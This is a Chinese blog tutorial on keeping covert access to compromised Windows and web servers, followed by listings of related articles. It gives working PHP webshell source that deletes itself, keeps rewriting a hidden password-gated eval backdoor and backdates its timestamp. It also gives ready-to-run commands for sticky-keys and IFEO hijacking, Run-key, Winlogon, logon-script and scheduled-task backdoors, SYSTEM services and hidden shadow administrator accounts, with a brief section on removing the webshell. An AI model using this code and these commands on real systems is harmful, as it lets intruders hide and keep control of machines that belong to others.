权限维持篇之Windows

最新推荐文章于 2025-03-24 17:28:08 发布
最新推荐文章于 2025-03-24 17:28:08 发布
阅读量348 收藏
点赞数
文章标签: windows 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mrx56/article/details/123904007
版权
文章介绍了多种Windows系统的后门技术,包括不死马木马的创建和消除方法,通过快捷键创建后门,映像劫持技术,不同类型的启动项(组策略、文件夹、注册表)来实现自启动,以及影子账户的创建。此外,还提到了winlogonuserinit后门和计划任务的利用,以及服务自启动的技巧,展示了黑客可能的攻击手段和防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.不死马

<?php 
ignore_user_abort(true); //ignore_user_abort设置ture时即使客户机关闭浏览器,不会终止脚本的执行
set_time_limit(0); //设置脚本的最大执行时间,0代表无限制
unlink(__FILE__);   //删除文件本身      (隐藏的效果)
$file = './.index.php';   //生成的一句木马的文件名
$code = '<?php if(md5($_POST["pass"])=="e771c5bd0272757ce1a75fb6c35528cb"){@eval($_POST[v]);} ?>';
//通过判断用户传入的变量,然后转换成md5值和e10adc3949ba59abbe56e057f20f883e进行对比,如果e10adc3949ba59abbe56e057f20f883e解密出来的值和用户传入的值是一样的话,就继续执行@eval($_POST['ZYGS']),是不死马防止被别人利用的关键
//内容这个是可以改变的
//e771c5bd0272757ce1a75fb6c35528cb=dhskanf 马儿用法:fuckyou.php?pass=dhskanf&v=command
while (1){
	file_put_contents($file,$code);
	system('touch -m -d ""2018-12-01 09:10:12" .index.php');
	//touch -m 修改文件时间,让防守方无法通过find命令来找到不死马文件。
	usleep(1);
}
?>

争对条件竞争的变种

<?php
 ignore_user_abort(true);
 set_time_limit(0);
 $file = 'c.php';
 $code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+');
   //一句话木马base64加密<?php @eval($_POST[c]);?>
 while(true) {
     if(md5(file_get_contents($file))===md5($code)) {       
     //获得文件内容与参数code进行比较,条件判断
         file_put_contents($file, $code);
     }
     usleep(50);
 }
?>

1.2kill不死马

  1. 重启服务
  2. kill进程(不死马本身是以进程的形式运行的)
<?php
while (1) {
	$pid = 不死马的进程PID;
	@unlink(".ski12.php");
	exec("kill -9 $pid");
	usleep(1000);
}
?>
  1. 条件竞争(写入速度必须快于不死马自己创建的速度)
<?php
set_time_limit(0);   //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长
ignore_user_abort(1);  //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。
while(1)
{     
    file_put_contents('shell.php','1111111');  //创建shell.php 
    usleep(0);    //间隔时间
}
?>

2.快捷键后门

Windows10 有一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。
一些常见的辅助功能如:
C:\Windows\System32\sethc.exe 粘滞键 快捷键:按五次 shift 键
C:\Windows\System32\utilman.exe 设置中心 快捷键:Windows+U 键
C:\Windows\System32\Magnify.exe 放大镜 快捷键:Windows+加减号

方法:

最常见的验证方法就是将恶意程序的文件名换成上面的名字,然后使用对应的快捷键就可以调用了。举例cmd.exe。

move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak  # 备份sethc.exe
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe # 替换

可能会遇到的问题:
我在实现这个操作的时候会遇到需要TrustedInstaller权限的情况,解决方法就是打开这个文件的属性,然后在安全栏目里点击高级,然后再点击更改,再点击一次高级,进入之后点击立即查找,双击你有权限操作的用户就可以了。

3.映像劫持

原理
注册表路径IFEO(image file execution options)的exe程序被修改,然后进行重定向执行后门程序的过程需要管理员权限。

方法一:注册表修改Debugger值

运行某exe程序时候,系统会在注册表image file execution option中寻找是否存在exe的项。
存在则寻找该项中Debugger的字符串值,找到则启动debugger值对应的程序,如果没有也可以自己创建然后将后门exe文件的完整路径传递给debugger程序。
所以我们将Debugger对应的程序改为后门即可运行。

cmd输入regedit打开注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
新建一个项test.exe(test可以改为其他名字),然后再创建一个子键Debugger(里面值就是你的shell路径)。最后在找到一个exe文件改名为test双击运行就会运行Debugger里填写路径里的程序。(如果本来不是exe可执行文件会报错)在这里插入图片描述

方法二:命令行修改

c:\windows\system32\xxx.exe为恶意程序路径

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v "Debugger" /t REG_SZ /d `"c:\windows\system32\xxx.exe" /f`

3.启动项

3.1组策略启动项

gpedit.msc上打开组策略,在Windows设置选项上有个脚本(启动/关机)选项,添加bat文件即可,如以下代码开机会执行该bat文件,该bat文件的作用是执行shell.ps1木马程序。

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit

在这里插入图片描述

3.2 文件夹启动项

直接将bat文件放在这些目录下

C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

3.3注册表启动(win+r输入regedit)

HKEY_LOCAL_MACHINE类

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

HKEY_CURRENT_USER类,不需要管理员权限

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

其中RunOnce 注册键:用户登录时,所有程序按顺序自动执行,在 Run 启动项之前执行,但只能运行一次,执行完毕后会自动删除

方法

可以直接在对应的注册表键值下添加恶意程序路径,也可以在命令行添加。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

4.影子账户

为什么要建立影子账户?
新建普通用户–>隐藏用户–>影子用户
net user ,计算机管理,注册表都可以看到–>只是cmd看不到–>只有注册表可以看到
所以建立影子用户会让管理员查看账户难度变高

方法

新建一个隐藏用户(用户名后加上$符)
net user test2$ 123456 /add
regedit打开注册表,找到HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/选项(SAM文件夹需要管理员权限才可以查看),在Names中找到你的账户与administrator记下右侧值然后去上面寻找对应项,点开administrator双击F复制其中内容,粘贴到你的账户对应的F的项里保存,最后将Names你的账户以及上面对应的项导出,cmd删除你的账户,在双击导出两个文件完成影子用户创建。(也可以直接创建一个管理员的隐藏账户然后直接导出)
在这里插入图片描述

6.winlogon userinit(用户登录初始化后门)

注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 会运行 Userinit.exe(运行登录脚本)userinit的作用是用户在进行登录初始化设置时,winlogon进程会执行指定的login scripts,所以我们可以修改它的键值来添加要执行的程序。

方法

1.直接注册表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下的添加userinit值,以 , 分开。
2.命令行实现:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:\Users\admin\Documents\backdoor.exe"

7.计划任务

Windows实现定时任务主要有schtasks与at二种方式:
At 适用于windows xp/2003,schtasks适用于win7/2008或者以后
#每天的16:34启动后门程序

schtasks /Create /TN badcode /SC DAILY /ST 16:49 /TR "C:\Users\admin\Documents\backdoor.exe"
at 16:34 /every:M,T,W,Th,F,S,Su C:\ZhiArchive\backdoor.exe

8.服务自启动

自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将 exe 文件注册为服务,也可以将 dll 文件注册为服务。

针对服务的操作,涉及到一条命令sc。其可以更改服务的属性、启动状态,删除或停止服务。

#创建名为test的服务(注意等号后面有空格),设置自启动,启动权限为system
sc create test binpath= C:\Users\Administrator\Desktop\poc.exe start= auto obj= Localsystem
#启动服务
et start test
#查询服务
sc query test
#删除服务
sc delete test

但通过这个方法启动exe后过几秒服务会停止运行。因为服务运行的exe不符合规范则会停止运行服务。此时我们需要对进程进行迁移,才会不掉线。也可以通过以下方法创建合法服务。
instsrv.exe.exe 和 srvany.exe 是 Microsoft Windows Resource Kits 工具集中 的两个实用工具,这两个工具配合使用可以将任何的 exe 应用程序作为 window 服务运行。srany.exe 是注册程序的服务外壳,可以通过它让应用程序以 system 账号启动,可以使应用程序作为 windows 的服务随机器启动而自动启动,从而隐藏不必要的窗口。

将 instsrv.exe 和 srvany.exe 拷贝到C:\WINDOWS\SysWOW64目录下,然后在 cmd 中先切换到C:\WINDOWS\SysWOW64目录,再运行命令

instsrv  test C:\WINDOWS\SysWOW64\srvany.exe

在修改注册表

 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\backdoor\Parameters" /f  #创建键值
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\backdoor\Parameters" /v AppDirectory /t REG_SZ /d "C:\Users\admin\Documents" /f  # 后门路径
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\backdoor\Parameters" /v Application /t REG_SZ /d "C:\Users\admin\Documents\backdoor.exe" /f  #后门程序

9.logon scripts 后门

Windows 登录脚本,当用户登录时触发,Logon Scripts 能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。

注册表位置:HKEY_CURRENT_USER\Environment

REG ADD “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”
用户一登录成功执行poc.exe

参考

mrx56
关注
Windows权限维持技术总结、复现_cs权限维持(1)
2401_84297035的博客
04-26 1077
利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。映像劫持,也叫重定向劫持。即想运行 A.exe,结果运行的是B.exe。在 Windows NT 架构的系统中,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
2401_84264692的博客
05-06 963
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
debug调试,注册表
dubuyunduan85的专栏
01-12 845
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hello.exe] "GlobalFlag"="x02200000" "PageHeapFlags"="0x3" "VerifierFlags"=dword:00000001
注册表键值无法重命名为“debugger”
liuyukuan的专栏
11-04 6904
<br />我想用notepad2代替notepad,结果按官网上说的访问去增加注册表项debugger (应该是映像劫持)<br />HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options<br />可我在注册表的这里新建一个字串值能命名为debugger ?<br />怎么办?<br /> <br />我只装了360安全卫士!<br />怎样让debugger可以写入<br
VSCODE上ckg_server_linux进程占用CPU过多
最新发布
dujunqiu的博客
03-24 503
每次一打开VSCODE,ckg_server_linux进程就启动了,并且一直运行,且占用CPU过高;主要原因还是我打开的文件夹太大了,marscode应该是有自动索引搜索之类的功能;本地搜索了一下,发现是 marscode插件影响的;禁用marscode之后再重新打开VSCODE就好了。推测应该是某个插件的问题导致的;
Windows权限维持之php死马、映像劫持、策略组脚本
Longwaer
01-09 1402
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
设置do.php到主机计划,php计划任务之ignore_user_abort函数实现方法
weixin_27012987的博客
03-09 206
本文实例讲述了php计划任务之ignore_user_abort函数实现方法。分享给大家供大家参考。具体分析如下:PHP 会检测到用户是否已断开连接,直到尝试向客户机发送信息为止,简单地使用 echo 语句无法确保信息发送,参阅 flush() 函数,代码如下:复制代码 代码如下:定义和用法ignore_user_abort() 函数设置与客户机断开是否会终止脚本的执行,本函数返回 user-a...
Windows下CMake 安装攻略(详细图文教程)
小白一枚~
02-16 2085
本教程详细讲解 Windows 下 CMake 的下载、安装及验证,适合新手快速上手,避免踩坑!
应急响应实战笔记:入侵分析、日志分析、权限维持windows实战、LInux实战WEB实战
12-25
应急响应实战笔记:入侵分析、日志分析、权限维持windows实战、LInux实战WEB实战
Windows权限维持
qq_40012781的博客
07-03 466
Windows权限维持
116.网络安全渗透测试—[权限提升14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2650
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
Windows下搭建kms激活服务器
48303354的博客
11-24 1万+
1、下载软件 https://github.com/Wind4/vlmcsd 打开链接 下载最新版 注意:关闭防火墙+Windows自带的Windows Defender。 解压下载的压缩包 把其中的“vlmcsd-Windows-x64.exe” copy到C:\Windows\System32 然后管理员运行cmd,进入路径C:\Windows\System32 运行命令: # Create System Service sc create KMSSrv binpath=%windir%\Syste
利用Windows系统服务进行权限提升
总有人间一两风,填我十万八千梦
01-26 3930
提权是后渗透重要的一环节,如果当前获取的用户权限比较低,那么我们将无法访问受保护的系统资源或执行系统管理操作,影响后续的攻击过程。这要求我们通过各种手段将当前用户的权限进行提升,以满足后续攻击的要求。
使程序默认以管理员权限运行(包括注册表修改法)
热门推荐
我是guyue,guyue就是我O(∩_∩)O
10-11 3万+
UAC技巧:使Windows内置程序默认以管理员权限运行 转载:  UAC技巧:使Windows内置程序默认以管理员权限运行_最火下载站 http://www.veryhuo.com/a/view/35011.html Windows Vista 和 Windows 7 中的用户帐户控制(UAC)功能可以为用户提供一个安全的桌面环境,所有程序默认都运行在普通权限(中完整性级
windows服务器权限分析
Web安全工具库
01-06 2284
遗憾的是:从来没有被坚定选择过,就像是,他只是刚好需要,你只是刚好在。。。 ---- 网易云热评 一、windows常见用户及用户组 1、System 本地机器上拥有最高权限的用户 2、Administrator 基本上是本地机器上拥有最高权限的用户 3、Guest 只拥有相对极少权限的用户,在默认情况下是被禁用的 4、Administrators 最高权限用户组 5、BackupOperators 没有Administrators权限高,但也差多 6、Guests 与us..
进程调试--进程启动VS自动附加
weixin_30563319的博客
05-29 735
程序启动VS自动附加到进程调试 1、 打开注册表regedit 2、 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options 3、 新建QQ.exe【需要调试的进程名】 4、 右键修改字符串值 5、 ...
supervisor 重启_.Net core 守护进程配置(supervisor)
weixin_39618176的博客
12-10 247
1、介绍supervisorSupervisor是用Python开发的一个client/server服务,是Linux/Unix系统下的一个进程管理工具,支持Windows系统。它可以很方便的监听、启动、停止、重启一个或多个进程。用Supervisor管理的进程,当一个进程意外被杀死,supervisort监听到进程死后,会自动将它重新拉起,很方便的做到进程自动恢复的功能,再需要自己...
十种流行进程注入技术详细分析
weixin_34050389的博客
09-13 1144
本文讲的是十种流行进程注入技术详细分析, 前言 流程注入是一种恶意软件和无文件间谍攻击中使用的最为广泛的漏洞攻击技术,而且在攻击时还需要在另一个进程的地址空间内运行自定义代码。过程注入除了提高了攻击的隐蔽性之外,也实现了持久性攻击。尽管目前有许多流程注入技术,但在本文中,我只介绍十种在野外看到的能够运用另一个进程运行恶意代码的技术。在介绍的同时,我还会...
关于系统服务、进程、共享文件夹管理的几个方式
飞机上错树
05-31 1531
如何授权普通用户(users组)管理特定系统服务:http://www.canway.net/Lists/CanwayOriginalArticels/DispForm.aspx?ID=348 2008下可以使用组策略或安全模板来配置实现;2003下用微软提供的subinacl工具实现,如: subinacl.exe /service * /grant=test=TOP 赋与test用户启动
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值